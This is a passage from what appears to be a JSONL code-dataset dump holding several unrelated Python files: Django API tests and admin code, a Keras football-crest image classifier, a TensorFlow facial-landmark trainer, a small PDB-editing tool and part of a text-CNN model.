dictionary\nmy_dict['does_not_exist'] # KeyError\n\n# A way\ntry:\n my_dict['does_not_exist']\nexcept KeyError:\n pass # That's ok, just keep going :)\n\n# A better way\nmy_dict.get('does_not_exist', None) # Return a default value if key doesn't exist\n\n\n\n\n\n\n","sub_path":"code-samples/code-samples/person.py","file_name":"person.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"453873384","text":"from django.test import TestCase\nfrom django.urls import reverse\nfrom rest_framework import status\nfrom .models import FavoriteThings, Categories, AuditLog\n\n\nclass BaseTestCaseHelper(object):\n\n def setUp(self):\n \"\"\"Define the test client and other test variables.\"\"\"\n self.title = \"Bill Gates\"\n self.category = Categories.objects.get_or_create(name='Person')[0]\n self.favorite_thing = FavoriteThings.objects.create(\n title=self.title,\n category=self.category,\n rank=1\n )\n\n\nclass FavoriteThingsListCreateAPIViewTestCase(BaseTestCaseHelper, TestCase):\n\n def test_api_can_create_a_favorite_thing_and_updates_ranks(self):\n \"\"\"Test the api can create a favorite thing.\"\"\"\n data = {\n 'title': 'Steve Jobs',\n 'category': self.category.id,\n 'rank': 1\n }\n response = self.client.post(\n reverse('list-create-favorite'),\n data,\n content_type='application/json'\n )\n\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.favorite_thing.refresh_from_db()\n self.assertEqual(self.favorite_thing.rank, 2)\n obj = 
FavoriteThings.objects.get(id=response.data['id'])\n self.assertEqual(obj.rank, 1)\n self.assertEqual(FavoriteThings.objects.count(), 2)\n\n def test_api_can_get_list_of_favorite_things(self):\n \"\"\"Test the api can get list of favorite things.\"\"\"\n response = self.client.get(\n reverse('list-create-favorite'),\n content_type='application/json'\n )\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data), 1)\n favorite_thing = response.data[0]\n self.assertEqual(favorite_thing['id'], self.favorite_thing.id)\n\n\nclass FavoriteThingsRetrieveUpdateDestroyAPIViewTestCase(BaseTestCaseHelper, TestCase): # noqa\n\n def test_api_can_get_a_favorite_thing(self):\n \"\"\"Test the api can get a given favorite thing.\"\"\"\n response = self.client.get(\n reverse('details-favorite', kwargs={'pk': self.favorite_thing.id}),\n content_type='application/json'\n )\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data.get('id'), self.favorite_thing.id)\n\n def test_api_can_update_favorite_thing_and_update_ranks(self):\n \"\"\"Test the api can update a given favorite thing.\"\"\"\n change_favorite_thing = {\n 'title': 'Something new',\n 'category': self.category.id,\n 'rank': 1\n }\n res = self.client.put(\n reverse('details-favorite', kwargs={'pk': self.favorite_thing.id}),\n change_favorite_thing,\n content_type='application/json'\n )\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(res.data.get('title'), change_favorite_thing['title'])\n self.assertEqual(res.data.get('category'), self.category.id)\n\n def test_api_can_delete_favorite_thing(self):\n \"\"\"Test the api can delete a given favorite thing.\"\"\"\n res = self.client.delete(\n reverse('details-favorite', kwargs={'pk': self.favorite_thing.id}),\n content_type='application/json'\n )\n self.assertEqual(res.status_code, status.HTTP_204_NO_CONTENT)\n\n\nclass CategoriesListCreateAPIViewTestCase(TestCase):\n\n def setUp(self):\n \"\"\"Define the test client and other test variables.\"\"\"\n self.cat1 = Categories.objects.create(name='Person')\n self.cat2 = Categories.objects.create(name='Food')\n\n def test_api_can_get_list_of_categories(self):\n \"\"\"Test the api can get list of categories.\"\"\"\n response = self.client.get(\n reverse('list-create-category'),\n content_type='application/json'\n )\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data), 2)\n\n cat1 = response.data[1]\n cat2 = response.data[0]\n\n self.assertEqual(cat1['id'], self.cat1.id)\n self.assertEqual(cat2['id'], self.cat2.id)\n\n def test_api_can_create_a_category(self):\n \"\"\"Test the api can create a category.\"\"\"\n data = {'name': 'Place'}\n response = self.client.post(\n reverse('list-create-category'),\n data,\n content_type='application/json'\n )\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n obj = Categories.objects.get(id=response.data['id'])\n self.assertEqual(obj.name, 'Place')\n\n\nclass AuditLogListCreateAPIViewTestCase(TestCase):\n\n def setUp(self):\n \"\"\"Define the test client and other test variables.\"\"\"\n self.audit1 = AuditLog.objects.create(title='Test 1', action=\"created\")\n self.audit2 = AuditLog.objects.create(title='Test 2', action=\"updated\")\n\n def test_api_can_get_list_of_audit_logs(self):\n \"\"\"Test the api can get list of audit logs.\"\"\"\n response = self.client.get(\n reverse('list-audits'),\n content_type='application/json'\n )\n\n 
self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data), 2)\n\n audit1 = response.data[1]\n audit2 = response.data[0]\n\n self.assertEqual(audit1['id'], self.audit1.id)\n self.assertEqual(audit2['id'], self.audit2.id)\n","sub_path":"api/apps/favorite_things/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"18561553","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nBy John Kenny\nConvolutional Neural Nework Training model\n\n\"\"\"\n\n#import coremltools\n\n#import keras\n#import tensorflow\n\n\n#Building the CNN\n\n#importing Keras libs and packages\n\n\n\n\n\nfrom keras.preprocessing.image import ImageDataGenerator \nfrom keras.models import Sequential \nfrom keras.layers import Conv2D, MaxPooling2D \nfrom keras.layers import Activation, Dropout, Flatten, Dense \nfrom keras import backend as K \n\n\n\n\nbatch = 5\nsize = 250 \n\n#initialise the cnn\nclassifier = Sequential()\n\n#Convolution layer\n\n#32 feature dectors with dimentions 3*3\nclassifier.add(Conv2D(32, (3, 3), input_shape=(250, 250, 3))) \nclassifier.add(Activation('relu')) \n\n\n#pooling layer\n\n#used to reduce the size of the feature map- reducing num of nodes and complexity \nclassifier.add(MaxPooling2D(pool_size=(2, 2)))\n\n#add an extra con layer\n\nclassifier.add(Conv2D(32, (3, 3))) \nclassifier.add(Activation('relu')) \nclassifier.add(MaxPooling2D(pool_size=(2, 2)))\n\n#add an extra con layer\n\nclassifier.add(Conv2D(32, (3, 3))) \nclassifier.add(Activation('relu')) \nclassifier.add(MaxPooling2D(pool_size=(2, 2)))\n\n#add an extra con layer\n\nclassifier.add(Conv2D(32, (3, 3))) \nclassifier.add(Activation('relu')) \nclassifier.add(MaxPooling2D(pool_size=(2, 2)))\n\n#add an extra con layer\n\nclassifier.add(Conv2D(32, (3, 3))) \nclassifier.add(Activation('relu')) \nclassifier.add(MaxPooling2D(pool_size=(2, 2)))\n\n\n\n\n#flatten layer\n\n#puts all the feature maps in one single vector\nclassifier.add(Flatten())\n\n\n# full connection of layers\n\n#128 nodes\nclassifier.add(Dense(units = 1500, activation = \"relu\"))\n #only 2 (sigmoid) other wise sofmax is needed \nclassifier.add(Dense(units = 20, activation = \"softmax\"))\n\n\n#compiling the CNN\n\n#without binary outcome crossentropy is needed\nclassifier.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\n\n# adding images to cnn\n\n#image preprocessing\nfrom keras.preprocessing.image import ImageDataGenerator\n\n\n#image augmentation \n\ntrain_datagen = ImageDataGenerator(\n rescale=1./255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True)\n\ntest_datagen = ImageDataGenerator(rescale=1./255)\n\ntrain_generator = train_datagen.flow_from_directory(\n 'dataset/training_set',\n target_size=(size, size),\n batch_size=5,\n class_mode='categorical')\n\nvalidation_generator = test_datagen.flow_from_directory(\n 'dataset/test_set',\n target_size=(size, size),\n batch_size=5,\n class_mode='categorical')\n\nclassifier.fit_generator(train_generator,\n steps_per_epoch=3847, epochs=100, validation_steps=20)\n\n\n\n#save the model\n\nimport h5py\n\nclassifier.save(\"model.h5\")\n\nfrom Ipython.display import SVG\nfrom keras.utils.vis_utils import model_to_dot\nSVG(model_to_dot(classifier).create(prog=\"dot\", format =\"svg\"))\n\n#plot graph using model\n\nfrom keras.utils import plot_model\n\nplot_model(classifier, \"graph.png\")\n\n#export model to 
coreml\n\nimport coremltools\n\noutput_labels = [\"Arsenal\", \"Bournemouth\", \"Brighton\", \"Burnley\", \"Chelsea\", \"Crystal Palace\", \"Everton\",\n                 \"Huddersfield Town\", \"Liverpool\", \"Leicester City\", \"Manchester City\", \"Manchester United\", \n                 \"Newcastle United\", \"Southampton\", \"Tottenham Hotspur\", \"Stoke City\", \"Swansea City\", \n                 \"Watford\", \"West Bromwich Albion\", \"West Ham United\"]\n\nscale = 1/255.\n\ncoreml_gen = coremltools.converters.keras.convert(\"model.h5\",\n                                                  input_names = 'image',\n                                                  image_input_names='image',\n                                                  class_labels =output_labels,\n                                                  image_scale= scale)\ncoreml_gen.author = \"John Kenny\"\ncoreml_gen.license = 'MIT'\ncoreml_gen.input_description['image'] = 'Image of a football crest'\ncoreml_gen.output_description['output1'] = \"Predicted team\"\ncoreml_gen.save(\"crestIdentifier.mlmodel\")\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Python model/ConVnet/Cnnfinal.py","file_name":"Cnnfinal.py","file_ext":"py","file_size_in_byte":4037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"22187719","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.contrib.auth.models import User\nfrom django.utils.safestring import mark_safe\n\nfrom .models import Profile\n\n\n# admin.site.register(Profile)\n\nclass InlineProfileAdmin(admin.StackedInline):\n    model = Profile\n    can_delete = False\n    fields = [\n        'user',\n        ('avatar', 'avatar_image'),\n        'interests'\n    ]\n    readonly_fields = ['avatar_image']\n\n    def avatar_image(self, obj):\n        return mark_safe(\n            '<img src=\"{url}\" width=\"{width}\">'.format(\n                url=obj.avatar.url,\n                width=200\n            )\n        )\n\n\nclass CustomUserAdmin(UserAdmin):\n    inlines = (InlineProfileAdmin,)\n    list_display = ['username', 'email', 'first_name', 'last_name', 'is_staff', 'avatar_image']\n    fieldsets = (\n        (None, {'fields': (('username', 'email'), 'password')}),\n        ('Personal info', {'fields': (('first_name', 'last_name'),), }),\n        ('Permissions', {\n            'fields': (('is_active', 'is_staff', 'is_superuser'), 'groups', 'user_permissions'),\n        }),\n        ('Important dates', {'fields': (('last_login', 'date_joined'),)}),\n    )\n    readonly_fields = ['last_login', 'date_joined']\n\n    def avatar_image(self, obj):\n        return mark_safe(\n            '<img src=\"{url}\" width=\"{width}\">'.format(\n                url=obj.profile.avatar.url,\n                width=60\n            )\n        )\n\n    avatar_image.short_description = 'Avatar'\n\n\nadmin.site.unregister(User)\nadmin.site.register(User, CustomUserAdmin)\n","sub_path":"accounts/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"57143564","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.utils import timezone\n\n\ndef initial_data(apps, schema_editor):\n    Question = apps.get_model('ex_django_tastypie', 'Question')\n\n    q = Question.objects.create(question_text=\"What's up?\", pub_date=timezone.now())\n    q.choice_set.create(choice_text='Not much', votes=0)\n    q.choice_set.create(choice_text='The sky', votes=0)\n    q.choice_set.create(choice_text='Just hacking again', votes=0)\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('ex_django_tastypie', '0001_initial'),\n    ]\n\n    operations = [\n        migrations.RunPython(initial_data),\n    
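    # NOTE (editor): migrations.RunPython also takes an optional reverse function so the data migration can be unapplied; a minimal hedged sketch with a hypothetical helper:\n        #   def remove_initial_data(apps, schema_editor):\n        #       Question = apps.get_model('ex_django_tastypie', 'Question')\n        #       Question.objects.filter(question_text=\"What's up?\").delete()\n        #   migrations.RunPython(initial_data, remove_initial_data)\n    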
]\n","sub_path":"ex_django_tastypie/migrations/0002_data.py","file_name":"0002_data.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"154956049","text":"import os\nimport cv2 as cv\nimport numpy as np\nimport tensorflow as tf\nimport datetime\nfrom tensorflow.python.framework import graph_util\n\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\nlabel_lines = []\nimage_lines = []\n\n\ndef read_img(txt_name):\n label_lines = []\n image_lines = []\n txt_open = open(txt_name)\n txt_read = txt_open.read()\n txt_lines = txt_read.split('\\n')\n\n for line in txt_lines:\n xlabel = []\n if len(line)>3:\n line_list = line.split(' ')\n image_lines.append(cv.imread(line_list[0]))\n xlabel.append(line_list[1])\n xlabel.append(line_list[2])\n for x in range(14):\n xlabel.append(line_list[117 + 2 + x * 2])\n xlabel.append(line_list[117 + 2 + x * 2 + 1])\n label_lines.append(xlabel)\n # label_lines.append(line_list[1:])\n\n\n label_linesc=[[float(i) for i in xline] for xline in label_lines]\n ximage_lines=np.array(image_lines, dtype='float32')\n ximage_lines = ximage_lines/256\n\n xlabel_linesc=np.array(label_linesc, dtype='float32')\n return ximage_lines,xlabel_linesc\n\n\n\n\ndef draw_form(MAX_STEP):\n step = MAX_STEP / 10\n img_H = 1000\n img_W = 1200\n coordinate = np.zeros((img_H, img_W, 3), np.uint8)\n coordinate[:, :, :] = 255\n line_c = 8\n coordinate = cv.line(coordinate, (100, img_H - 100), (img_W, img_H - 100), (0, 0, 0), 2)\n coordinate = cv.line(coordinate, (100, 0), (100, img_H - 100), (0, 0, 0), 2)\n\n for i in range(11):\n coordinate = cv.line(coordinate, (i * 100 + 100, img_H - 100), (i * 100 + 100, 0), (0, 0, 0), 1)\n coordinate = cv.line(coordinate, (100, i * 100 + 100), (img_W, i * 100 + 100), (0, 0, 0), 1)\n if i > 0:\n cv.putText(coordinate, str(i * step), (i * 100 + 100 - 32, img_H - 100 + 50), cv.FONT_HERSHEY_SIMPLEX, 0.6,\n (0, 0, 0), 2)\n biaohao = '%.1f' % (1.0 - i * 0.1 - 0.2)\n if biaohao == '-0.0':\n cv.putText(coordinate, '0', (100 - 50, i * 100 + 100 + 10 + 30), cv.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 2)\n else:\n cv.putText(coordinate, biaohao, (100 - 50, i * 100 + 100 + 10), cv.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 2)\n\n return coordinate\n\ndef drow_spot(img,x,y,MAX_STEP):\n # for i in range(x.shape[0]):\n\n put_str='step:%d loss:%.5f'%(x,y)\n print(put_str)\n img[120:180,500:830,:]=255\n cv.putText(img, put_str,(500,150), cv.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0), 2)\n spot_x = int(x/MAX_STEP*1000+100)\n spot_y =int(900-y*1000)\n # print('画点位置:',spot_x,spot_y)\n cv.circle(img,(spot_x,spot_y),3,(0,0,255),-1)\n\n\n\n cv.imshow('LOSS',img)\n cv.waitKey(10)\n\n\ndef face_net(batch_size,height, width, n_classes,learning_rate):\n print(batch_size,height, width, n_classes,learning_rate)\n x = tf.placeholder(tf.float32, shape=[None, height, width, 3], name='input')\n y = tf.placeholder(tf.float32, shape=[None, n_classes], name='labels')\n\n def weight_variable(shape, name=\"weights\"):\n initial = tf.truncated_normal(shape, dtype=tf.float32, stddev=0.1)\n return tf.Variable(initial, name=name)\n\n def bias_variable(shape, name=\"biases\"):\n initial = tf.constant(0.1, dtype=tf.float32, shape=shape)\n return tf.Variable(initial, name=name)\n with tf.variable_scope('conv1') as scope:\n W1 = weight_variable([3, 3, 3, 32])\n b1 = bias_variable([32])\n conv = tf.nn.conv2d(x, W1, strides=[1, 1, 1, 1], padding=\"SAME\")\n pre_activation = tf.nn.bias_add(conv, b1)\n relu1 = 
tf.nn.relu(pre_activation, name=\"relu1\")\n\n with tf.variable_scope('conv2') as scope:\n W2 = weight_variable([3, 3, 32, 64])\n b2 = bias_variable([64])\n conv2 = tf.nn.conv2d(relu1, W2, strides=[1, 2, 2, 1], padding='SAME')\n relu2 = tf.nn.relu(tf.nn.bias_add(conv2, b2), name='relu2')\n\n\n with tf.variable_scope('conv3') as scope:\n W3 = weight_variable([3, 3, 64, 128])\n b3 = bias_variable([128])\n conv3 = tf.nn.conv2d(relu2, W3, strides=[1, 1, 1, 1], padding='SAME')\n relu3 = tf.nn.relu(tf.nn.bias_add(conv3, b3), name='relu3')\n\n with tf.variable_scope('conv4') as scope:\n W4 = weight_variable([3, 3, 128, 256])\n b4 = bias_variable([256])\n conv4 = tf.nn.conv2d(relu3, W4, strides=[1, 2, 2, 1], padding='SAME')\n relu4 = tf.nn.relu(tf.nn.bias_add(conv4, b4), name='relu4')\n\n\n with tf.variable_scope('conv5') as scope:\n W5 = weight_variable([3, 3, 256, 128])\n b5 = bias_variable([128])\n conv5 = tf.nn.conv2d(relu4, W5, strides=[1, 1, 1, 1], padding='SAME')\n relu5 = tf.nn.relu(tf.nn.bias_add(conv5, b5), name='relu5')\n\n\n # with tf.variable_scope('conv6') as scope:\n # W6 = weight_variable([3, 3, 512, 256])\n # b6 = bias_variable([256])\n # conv6 = tf.nn.conv2d(relu5, W6, strides=[1, 2, 2, 1], padding='SAME')\n # relu6 = tf.nn.relu(tf.nn.bias_add(conv6, b6), name='relu6')\n\n with tf.variable_scope('conv7') as scope:\n W7 = weight_variable([3, 3, 128, 256])\n b7= bias_variable([256])\n conv7 = tf.nn.conv2d(relu5, W7, strides=[1, 1, 1, 1], padding='SAME')\n relu7 = tf.nn.relu(tf.nn.bias_add(conv7, b7), name='relu7')\n\n\n\n # 全连接层\n with tf.variable_scope(\"fc1\") as scope:\n\n dim = int(np.prod(relu7.get_shape()[1:]))\n reshape = tf.reshape(relu7, [-1, dim])\n weights1 =weight_variable([dim, 256]) ##24*24*256*256\n biases1 = bias_variable([256])\n fc1 = tf.nn.dropout(tf.nn.relu(tf.matmul(reshape, weights1) + biases1, name=\"fc1\"),0.5)\n\n with tf.variable_scope(\"fc2\") as scope:\n weights122 =weight_variable([256, 1024])\n biases122 = bias_variable([1024])\n fc2 = tf.nn.dropout(tf.nn.relu(tf.matmul(fc1, weights122) + biases122, name=\"fc2\"),0.5)\n\n with tf.variable_scope(\"output\") as scope:\n weights2 = weight_variable([1024, n_classes])\n biases2 = bias_variable([n_classes])\n # y_conv = tf.sigmoid(tf.matmul(fc2, weights2)+biases2, name=\"output\")\n # y_conv = tf.sigmoid(tf.matmul(fc2, weights2)+biases2, name=\"output\")\n y_conv=tf.add(tf.matmul(fc2, weights2),biases2, name=\"output\")\n yy_conv =tf.add(y_conv,0,name='xoutput')\n # rmse = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=y_conv, labels=y))\n rmse = tf.sqrt(tf.reduce_mean(tf.square( y - y_conv)))\n\n with tf.name_scope(\"optimizer\"):\n optimize = tf.train.AdamOptimizer(learning_rate=learning_rate)\n global_step = tf.Variable(0, name=\"global_step\", trainable=False)\n train_op = optimize.minimize(rmse, global_step=global_step)\n print()\n return dict(\n x=x,\n y=y,\n weights2= [weights2,weights122],\n biases2=[biases2,biases122],\n y_conv=y_conv,\n optimize=train_op,\n cost=rmse,\n )\n\n\ndef run_training(txt_name):\n imgs = draw_form(MAX_STEP)\n logs_train_dir = './face72/face_0821/'\n X_data, Y_data = read_img(txt_name)\n graph= face_net(BATCH_SIZE, IMG_H,IMG_W, N_CLASSES,learning_rate)\n # summary_op = tf.summary.merge_all()\n sess = tf.Session()\n # train_writer = tf.summary.FileWriter(logs_train_dir, sess.graph)\n saver = tf.train.Saver()\n sess.run(tf.global_variables_initializer())\n ckpt = tf.train.get_checkpoint_state(logs_train_dir)\n y_step=0\n if ckpt and 
ckpt.model_checkpoint_path:\n global_step = ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1]\n saver.restore(sess, ckpt.model_checkpoint_path)\n print(global_step)\n y_step = int(float(global_step))\n\n loss_list ={}\n loss_list['x']=[]\n loss_list['y'] = []\n\n for step in np.arange(MAX_STEP):\n loss_avg=0.0\n for i in range(BATCH_SIZE):\n xb= (step%332)*32+i\n # ximage=np.array(X_data[xb]*255+127.5, dtype='uint8')\n # for xxi in range(72):\n # cv.circle(ximage,(int(Y_data[xb][2+2*xxi]*96),int(Y_data[xb][2+2*xxi+1]*96)),2,(0, 255, 255), -1)\n # cv.imshow('ximage',ximage)\n # cv.waitKey()\n # print(xb)\n _, tra_loss, weights2, biases2 = sess.run([graph['optimize'],graph['cost'],graph['weights2'],graph['biases2']],feed_dict={\n graph['x']: np.reshape(X_data[xb], (1, 96, 96, 3)),\n graph['y']: np.reshape(Y_data[xb], (1, 30))})\n loss_avg+=tra_loss\n\n avg_loss =loss_avg/BATCH_SIZE\n\n loss_list['x'].append(step+y_step)\n loss_list['y'].append(avg_loss)\n\n drow_spot(imgs,step, avg_loss, MAX_STEP)\n\n\n print('次数:',step,'对应loss:',avg_loss)\n\n # = sess.run(, feed_dict={\n # graph['x']: np.reshape(X_data[xb], (1, 96, 96, 3)),\n # graph['y']: np.reshape(Y_data[xb], (1, 30))})\n\n if step % 50 == 0:\n print('Step %d,train loss = %.5f' % (step+y_step, avg_loss))\n constant_graph = graph_util.convert_variables_to_constants(sess, sess.graph_def,\n ['xoutput'])\n with tf.gfile.FastGFile(logs_train_dir + 'facex.pb', mode='wb') as f:\n f.write(constant_graph.SerializeToString())\n\n\n # 每迭代50次,打印出一次结果\n # summary_str = sess.run(summary_op)\n # train_writer.add_summary(summary_str, step)\n if step % 200 == 0 or (step + 1) == MAX_STEP:\n checkpoint_path = os.path.join(logs_train_dir, 'model.ckpt')\n saver.save(sess, checkpoint_path, global_step=step+y_step)\n # 每迭代200次,利用saver.save()保存一次模型文件,以便测试的时候使用\n sess.close()\n\n\n\ntxt_name= 'trains.txt'\nIMG_W = 96\nIMG_H = 96\n\nBATCH_SIZE = 32\nCAPACITY = 32\nMAX_STEP = 4000\nlearning_rate = 0.0001\nN_CLASSES = 30\nrun_training(txt_name)\n\n\n\n\ndef get_one_image(img_dir):\n image = cv.imread(img_dir)\n # 好像一次只能打开一张图片,不能一次打开一个文件夹,这里大家可以去搜索一下\n bei_x = 96 / int(image.shape[1])\n bei_y = 96 / int(image.shape[0])\n min_bian = min(image.shape[0], image.shape[1])\n max_bian = max(image.shape[0], image.shape[1])\n # bei_x = 48 / max_bian\n # print(12346)\n # if image.shape[0] == min_bian:\n # cha = int((image.shape[1] - min_bian) / 2)\n # images = np.zeros((image.shape[1], image.shape[1], 3), np.uint8)\n # images[cha:cha + min_bian, :, :] = image\n # image = cv.resize(images, None, fx=bei_x, fy=bei_x, interpolation=cv.INTER_CUBIC)\n # else:\n # cha = int((image.shape[0] - min_bian) / 2)\n # images = np.zeros((image.shape[0], image.shape[0], 3), np.uint8)\n # images[:, cha:cha + min_bian, :] = image\n # image = cv.resize(images, None, fx=bei_x, fy=bei_x, interpolation=cv.INTER_CUBIC)\n image = cv.resize(image, None, fx=bei_x, fy=bei_y, interpolation=cv.INTER_CUBIC)\n image_arr = np.array(image)\n\n return image_arr\n\n\ndef val(test_file):\n log_dir = './face72/face_0807/'\n # image_arr=test_file\n image_arr = get_one_image(test_file)\n with tf.Graph().as_default():\n image =image_arr/256\n # image = tf.cast(image_arr, tf.float32)\n # image = tf.image.per_image_standardization(image) ###归一化操作\n # image = tf.reshape(image, [1, 96, 96, 3])\n op_intp = np.zeros(N_CLASSES, np.float32)\n\n # batch_size,height, width, n_classes,learning_rate\n graph= face_net(1,96, 96, 30,learning_rate)\n # print('看看p的值:',p)\n # logits = graph['cost'] # tf.nn.softmax(p)\n # x = 
tf.placeholder(tf.float32, shape=[1,96, 96, 3])\n saver = tf.train.Saver()\n with tf.Session() as sess:\n ckpt = tf.train.get_checkpoint_state(log_dir)\n print('看看值',ckpt.model_checkpoint_path)\n if ckpt and ckpt.model_checkpoint_path:\n global_step = ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1]\n saver.restore(sess, ckpt.model_checkpoint_path)\n # 调用saver.restore()函数,加载训练好的网络模型\n # print('Loading success')\n else:\n print('没有保存的模型')\n prediction = sess.run(graph['y_conv'] , feed_dict={graph['x']: np.reshape(image, (1, 96, 96, 3)),graph['y']:np.reshape(op_intp, (1, 30))})\n return prediction\n\nfile_path = '../face68/image_test'\n# file_path ='E:/face68/trainb'\n# file_path ='E:/face into'\n# file_path ='E:/face72/trainb'\n# file_path ='E:/face68/trainb'\nfor file in os.listdir(file_path):\n img_path = file_path + '/' + file\n img = cv.imread(img_path)\n start_time = datetime.datetime.now()\n prediction = val(img_path)\n print('耗时:',datetime.datetime.now()-start_time)\n img = cv.resize(img, (480, 480), interpolation=cv.INTER_CUBIC)\n print( prediction[0][0:2])\n\n biaoq ='None'\n if prediction[0][0]>= 0.8 and prediction[0][0]<1.6:\n biaoq = 'Smile'\n elif prediction[0][0]>=1.6:\n biaoq = 'Laugh'\n biaoq+=':' + str(prediction[0][1])\n img = cv.putText(img, biaoq, (0, 30), 2, cv.FONT_HERSHEY_PLAIN, (255, 0, 0))\n for i in range(int(len(prediction[0]) / 2)-1):\n cv.circle(img, (int(prediction[0][2+i * 2] * img.shape[1]), int(prediction[0][2+i * 2 + 1] * img.shape[0])), 2,\n (0, 255, 255), -1)\n\n cv.imshow('img', img)\n cv.waitKey()\n cv.destroyAllWindows()","sub_path":"face_into/face72/face_pb.py","file_name":"face_pb.py","file_ext":"py","file_size_in_byte":13539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"280996949","text":"from peddit.parser import parse_arguments\nfrom peddit.peddit import Peditor\nfrom peddit.plotter import plotter\n\nimport matplotlib.pyplot as plt\n\n\ndef main(): \n print(\"Initiating Peddit tool.\")\n args = parse_arguments() \n\n c = Peditor(args)\n c.struct_retrieve()\n c.replace_ent_to_pdb_name()\n\n a = c.editor()\n c.edited_pdb_writer(args, a)\n print(\"\\nPDB file written.\")\n\n\n print(f\"Calculating bonds for {args.id_input}.pdb...\")\n c.calculate_interaction(f\"{args.id_input}_bonds.csv\")\n print(\"Writing bonds interaction file: done\")\n\n\n print(\"\\nPlotting the data...\")\n plotter(f\"{args.output_path}/{args.id_input}_bonds.csv\")\n plt.show()\n\n\nif __name__ == '__main__': \n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"123988735","text":"\"\"\"\r\nimplementation of CNN model to oprate on texts\r\n\"\"\"\r\n\r\nimport tensorflow as tf\r\nimport math\r\n\r\nclass CNN:\r\n \"\"\"\r\n a CNN model to get representations of tokens\r\n --input: sentences, aka. 
sequences of words\r\n    --embedding layer\r\n    --multi conv layer\r\n    --pooling\r\n    --full connection\r\n    --manually drop-out\r\n    --negative-sampling\r\n    \"\"\"\r\n\r\n    def __init__(self, sentence_length, vocab_size, embedding_size, filter_sizes, num_filters, num_labels=1, l2_reg_lambda=0.0):\r\n        \"\"\"\r\n        init the class\r\n        :param sentence_length: sentence length\r\n        :param vocab_size: how many different words\r\n        :param embedding_size: 200, 100 for structure ; 100 for natural language\r\n        :param filter_sizes: n-grams\r\n        :param num_filters: number of conv filters\r\n        :param l2_reg_lambda: 0.0 means no l2 regularization\r\n        \"\"\"\r\n\r\n        # configure word2vec parameters\r\n        self.num_sampled = 64\r\n\r\n\r\n        # input, output, dropout\r\n        self.batch = tf.placeholder(tf.int32, [None, sentence_length], name='batch')  # placeholder for word ids\r\n        self.labels = tf.placeholder(tf.int64, [None, num_labels], name='label')  # target word ids; tf.nn.nce_loss expects integer labels\r\n        self.dropout_keep_prob = tf.placeholder(tf.float32, name='dropout_keep_prob')  # value should be in [0, 1]\r\n\r\n        # l2 regularization loss (optional)\r\n        l2_loss = tf.constant(l2_reg_lambda)\r\n\r\n        # embedding layer\r\n        with tf.device('/cpu:0'), tf.name_scope('embedding'):\r\n            self.W = tf.Variable(tf.random_uniform([vocab_size, embedding_size], -1.0, 1.0), name='W')\r\n\r\n            # result tensor: [None, sentence_length, embedding_size]\r\n            self.embedded_words = tf.nn.embedding_lookup(self.W, self.batch)\r\n\r\n            # since conv2d operation expects 4-dimensional tensor which are batch, width, height, channel respectively\r\n            # we expand the embedding with channel=1\r\n            self.embedded_words_expanded = tf.expand_dims(self.embedded_words, -1)\r\n\r\n        # Create a convolution + maxpool layer for each filter size\r\n        pooled_outputs = []\r\n        for i, filter_size in enumerate(filter_sizes):\r\n            with tf.name_scope(\"conv-maxpool-%s\" % filter_size):\r\n                # Convolution Layer\r\n                filter_shape = [filter_size, embedding_size, 1, num_filters]\r\n                W = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name=\"W\")\r\n                b = tf.Variable(tf.constant(0.1, shape=[num_filters]), name=\"b\")\r\n                conv = tf.nn.conv2d(\r\n                    self.embedded_words_expanded,\r\n                    W,\r\n                    strides=[1, 1, 1, 1],\r\n                    padding=\"VALID\",\r\n                    name=\"conv\")\r\n                # Apply nonlinearity\r\n                h = tf.nn.relu(tf.nn.bias_add(conv, b), name=\"relu\")\r\n                # Maxpooling over the outputs\r\n                pooled = tf.nn.max_pool(\r\n                    h,\r\n                    ksize=[1, sentence_length - filter_size + 1, 1, 1],\r\n                    strides=[1, 1, 1, 1],\r\n                    padding='VALID',\r\n                    name=\"pool\")\r\n                pooled_outputs.append(pooled)\r\n\r\n        # Combine all the pooled features\r\n        num_filters_total = num_filters * len(filter_sizes)\r\n        self.h_pool = tf.concat(pooled_outputs, 3)\r\n        self.h_pool_flat = tf.reshape(self.h_pool, [-1, num_filters_total])\r\n\r\n        # Add dropout\r\n        with 